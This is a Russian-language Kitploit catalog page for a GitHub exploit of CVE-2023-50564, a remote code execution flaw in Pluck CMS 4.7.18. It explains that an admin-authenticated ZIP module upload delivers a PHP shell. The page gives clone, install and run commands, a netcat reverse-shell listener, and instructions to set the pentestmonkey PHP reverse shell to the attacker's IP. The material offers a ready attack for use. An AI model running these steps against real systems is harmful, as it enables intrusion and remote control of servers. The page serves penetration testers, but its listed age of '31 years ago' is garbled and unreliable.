Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - Удаленное выполнение кода (RCE) | Kitploit
Инструменты/GitHubGitHub/glynzr/cve-2023-50564
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - Удаленное выполнение кода (RCE)

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-50564

📌 Описание

Эта эксплойт позволяет аутентифицированному администратору Pluck CMS v4.7.18 загрузить вредоносный ZIP-модуль, содержащий PHP-шелл, что приводит к удаленному выполнению кода (RCE).


⚙️ Возможности

  • Аутентификация на целевой системе с использованием действительных имени пользователя и пароля
  • Автоматическое создание ZIP-архива из предоставленного PHP-файла
  • Загрузка модуля на уязвимую конечную точку installmodule
  • Запуск полезной нагрузки и отображение вывода
  • Поддержка настраиваемой цели, порта, учетных данных и пути к шеллу

🚀 Использование

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <цель> -u <имя_пользователя> -pass <пароль> -path <путь_к_php_shell> [-p <порт>]
  • Порт необязателен и по умолчанию равен 80, если не указан.
  • При указании цели требуется IP-адрес или доменное имя (например, 127.0.0.1 или test.domain).

Пример эксплойта

Сначала на машине атакующего следует запустить слушатель реверс-шелла (эту вкладку терминала не следует закрывать):

root@kitploit:~
nc -nvlp <укажите_порт>

Затем загрузите PHP-реверс-шелл с https://github.com/pentestmonkey/php-reverse-shell и настройте его под машину атакующего (IP, порт).

Запустите код эксплойта на другой вкладке:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
Скачать инструмент